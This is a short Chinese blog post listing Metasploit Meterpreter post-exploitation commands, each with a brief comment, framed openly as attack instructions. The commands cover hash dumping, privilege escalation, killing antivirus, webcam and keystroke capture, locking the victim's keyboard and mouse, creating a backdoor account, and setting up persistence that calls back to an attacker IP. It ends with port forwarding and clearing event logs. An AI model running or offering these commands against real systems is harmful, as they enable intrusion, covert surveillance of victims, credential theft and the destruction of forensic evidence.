首页 > 其他分享 >msfconsole攻击指令

msfconsole攻击指令

时间:2024-12-12 20:54:59浏览次数:10  
标签:run 查看 msfconsole 攻击 主机 192.168 目标 指令 test

Post后渗透模块
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接
192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev #清除日志

标签:run,查看,msfconsole,攻击,主机,192.168,目标,指令,test
From: https://www.cnblogs.com/bhdk/p/18603416

相关文章

  • 反序列化漏洞原理、成因、危害、攻击、防护、修复方法
    反序列化漏洞是一种安全漏洞,它允许攻击者将恶意代码注入到应用程序中。这种漏洞通常发生在应用程序从不安全的来源反序列化数据时。当应用程序反序列化数据时,它将数据从一种格式(例如JSON或XML)转换为另一种格式(例如对象或列表)。如果应用程序不检查数据的安全性,攻击者就可以将......
  • 强化学习模型的训练和推理以及成员推断攻击的实现
    Reinforcement_learning2024年9月1日更新在此教程中,我们将对强化学习模型及其原理进行一个简单的介绍,并实现一种强化学习模型的训练和推理过程,且至少支持3种数据集,目前支持数据集有:MNIST、fashionMNIST、CIFAR10等,并给用户提供一个详细的帮助文档。目录基本介绍什么是强化学......
  • 成员推断攻击的实现(至少支持三种数据集)
    MembershipInferenceAttack2024年5月12日更新在此教程中,我们将对成员推断攻击的定义及其原理进行一个简单的介绍,并实现成员推断攻击模型,目前支持数据集有:MNIST、fashionMNIST、CIFAR10等,同时给用户提供一个详细的说明和帮助文档。目录基本介绍定义核心思想分类影子模......
  • RNN模型的训练和推理以及成员推断攻击的实现
    循环神经网络(RNN)2024年7月20日更新在此教程中,我们将对循环神经网络RNN模型及其原理进行一个简单的介绍,并实现RNN模型的训练和推理,目前支持MNIST、FashionMNIST和CIFAR-10等数据集,并给用户提供一个详细的帮助文档。同时,本项目还将实现循环神经网络的模型成员推理攻击,以及复杂场......
  • 图模型的训练和推理以及成员推理攻击的实现
    graph_model2024年10月14日更新在此教程中,我们将对深度学习中的图模型及其原理进行一个简单的介绍,并实现一种图模型的训练和推理,至少支持三种数据集,目前支持数据集有:Cora、CiteSeer、PubMed等,并给用户提供一个详细的帮助文档。目录基本介绍目前存在的问题现有模型应用场景......
  • AT 固件指令
    AT指令概念:就是猫(Modem)的命令语言(Hayes公司发明)作用:GSM(2G,3G,4G...)等交互通讯的命令场景4Gcate1、cate4移动模块(合宙,中移)等流行的模块用于物联网设备最省钱的方案2G2021年6月已經工信部下架不在批准申请,退网。但是存量的依然可用互联网的兴起导致了AT诞生......
  • Vue中常见指令
    在Vue.js中,指令(Directives)是带有v-前缀的特殊属性,用于在HTML元素上添加特殊的Vue行为。它们可以用来绑定数据、监听事件、控制条件渲染等1.v-bind用途:动态地绑定一个或多个属性,或一个组件的prop到表达式。语法:<!--动态class绑定--><divv-bind:class="{active:isActi......
  • 成员推理攻击的防御方法及简单实现
    defense_methods2024年12月14日更新前面我们实现了多种模型的成员推理攻击,接下来我们将针对其防御方法及其原理进行一个简单的介绍,并进行简单的代码实现,给用户提供一个详细的帮助文档。目录基本介绍常用方法介绍简单实现基本介绍机器学习中的成员推理攻击指的是攻击者可以......
  • 转载:【AI系统】CPU 指令集架构
    我们知道,计算机指令是指挥机器工作的指示和命令,程序就是一系列指令按照顺序排列的集合,执行程序的过程就是计算机的工作过程。从微观上看,我们输入指令的时候,计算机会将指令转换成二进制码存储在存储单元里面,然后在即将执行的时候拿出来。那么计算机是怎么知道我们输入的是什么指令,......
  • vue el-select封装一个滚动加载更多下拉选项的自定义指令
    没有什么讲究,直接上代码模板部分<el-selectv-model="operator"filterableremotesize="small"reserve-keywordplaceholder="请输入经办人姓名":......